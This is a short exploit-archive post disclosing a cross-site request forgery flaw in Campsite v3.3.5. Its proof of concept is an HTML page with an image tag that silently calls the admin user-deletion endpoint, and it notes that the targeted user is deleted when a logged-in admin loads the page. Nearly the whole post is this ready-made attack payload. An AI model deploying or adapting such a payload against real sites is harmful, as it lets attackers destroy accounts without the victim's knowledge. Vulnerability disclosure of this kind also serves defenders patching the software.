Home / os / winme

Campsite v3.3.5 CSRF Vulnerability

Posted on 10 March 2010

================================== Campsite v3.3.5 CSRF Vulnerability ================================== # Site p4ge http://wwwcampware.org/ # Plateform php # Proof of concept # Targeted URL: http://server/admin/login.php Script to delete the Admin user through Cross Site request forgery . .................................................................................................................. <html> <body> <img src=http://server/admin/users/do_del.php?User=[userID]&uType=Staff /> </body> </html> . .................................................................................................................. After execution refresh the page and u can see that user having giving ID get deleted automatically. # ~ - [ [ : Inj3ct0r : ] ]

 

TOP